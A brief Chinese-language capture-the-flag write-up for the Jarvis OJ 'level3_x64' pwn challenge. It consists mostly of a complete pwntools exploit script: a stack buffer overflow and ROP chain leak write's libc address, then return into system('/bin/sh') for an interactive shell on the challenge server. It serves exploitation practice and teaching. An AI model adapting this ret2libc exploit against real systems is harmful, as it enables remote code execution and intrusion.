(Jarvis Oj)(Pwn) level3_x64

(Jarvis Oj)(Pwn) level3_x64

这题是level3的64位版本，思路和32位版本一致，不同之处就是函数的参数传递，利用寄存器，于是构造rop链。写得脚本如下：

from pwn import *                                                                                                      
#conn=process('./level3_x64')
conn=remote("pwn2.jarvisoj.com", "9883")
e=ELF('./level3_x64')
#libc=ELF('/usr/lib64/libc-2.26.so')
libc=ELF('./libc-2.19.so')
pad=0x80
vul_addr=0x4005e6
write_plt=e.symbols['write']
write_got=e.got['write']
pop_rdi=0x4006b3 #pop rdi;ret
pop_rsi=0x4006b1 #pop rsi;pop r15;ret
#edx=0x200 is not serious
payload1="A"*pad+"BBBBBBBB"+p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(write_got)+"deadbuff"+p64(write_plt)+p64(vul_addr)
conn.recvuntil("Input:\n")
conn.sendline(payload1)
write_addr=u64(conn.recv(8))
#print write_addr 
libc_write=libc.symbols['write']
libc_system=libc.symbols['system']
libc_sh=libc.search('/bin/sh').next()
system_addr=(libc_system-libc_write)+write_addr
sh_addr=(libc_sh-libc_write)+write_addr
payload2="A"*pad+"BBBBBBBB"+p64(pop_rdi)+p64(sh_addr)+p64(system_addr)+"deadbuff"
conn.recvuntil("Input:\n")
conn.sendline(payload2)
conn.interactive()